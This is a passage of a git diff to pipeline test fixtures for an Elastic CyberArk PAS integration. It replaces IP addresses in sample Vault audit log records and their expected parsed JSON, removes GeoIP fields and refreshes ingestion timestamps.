Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=34.123.103.115;username=testark;\",\"Message\":\"CPM Verify Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:41.072873500Z", + "original": "\u003c5\u003e1 2021-03-15T10:22:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e22\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:44\",\"IsoTimestamp\":\"2021-03-15T10:22:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"22\",\"Desc\":\"CPM Verify Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Verify Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "22", "kind": "event", "action": "cpm verify password", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log index 51629665b2b..b4953ee2439 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log @@ -1,3 +1,3 @@ -<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} +<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} <7>1 2021-03-14T12:07:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:07:27\n 2021-03-14T12:07:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n PasswordManager\n Action On Closed Safe\n \n \n AccountsFeedADAccounts\n \n 10.0.1.20\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:27","IsoTimestamp":"2021-03-14T12:07:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"PasswordManager","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"AccountsFeedADAccounts","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} -<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 34.71.250.247\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} +<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 67.43.156.15\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json index 452d8fa29d0..015a865644a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -46,7 +34,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Action On Closed Safe", "message": "Action On Closed Safe", "issuer": "Administrator", @@ -59,8 +47,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:29.424500300Z", - "original": "\u003c7\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:41.393352600Z", + "original": "\u003c7\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", "action": "action on closed safe", @@ -115,7 +103,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:29.424518Z", + "ingested": "2021-12-09T13:36:41.393360900Z", "original": "\u003c7\u003e1 2021-03-14T12:07:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:07:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:07:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e23\u003c/MessageID\u003e\\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eAccountsFeedADAccounts\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:07:27\",\"IsoTimestamp\":\"2021-03-14T12:07:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AccountsFeedADAccounts\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", @@ -130,17 +118,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -157,7 +136,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -166,8 +145,8 @@ "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:16Z", "safe": "PSMPConf", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e23\u003c/MessageID\u003e\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPConf\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e23\u003c/MessageID\u003e\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPConf\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Action On Closed Safe", "message": "Action On Closed Safe", "issuer": "Administrator", @@ -180,8 +159,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:29.424522900Z", - "original": "\u003c7\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e23\u003c/MessageID\u003e\\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPConf\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:41.393365600Z", + "original": "\u003c7\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e23\u003c/MessageID\u003e\\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPConf\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", "action": "action on closed safe", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json index 36ac10d015d..ce8b170d2df 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json @@ -70,7 +70,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.491218300Z", + "ingested": "2021-12-09T13:36:41.659740900Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e24\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=radiussrv.cyberark.local;username=test12;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"test12\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1604943844\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1604944158\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=radiussrv.cyberark.local;username=test12;\",\"Message\":\"CPM Change 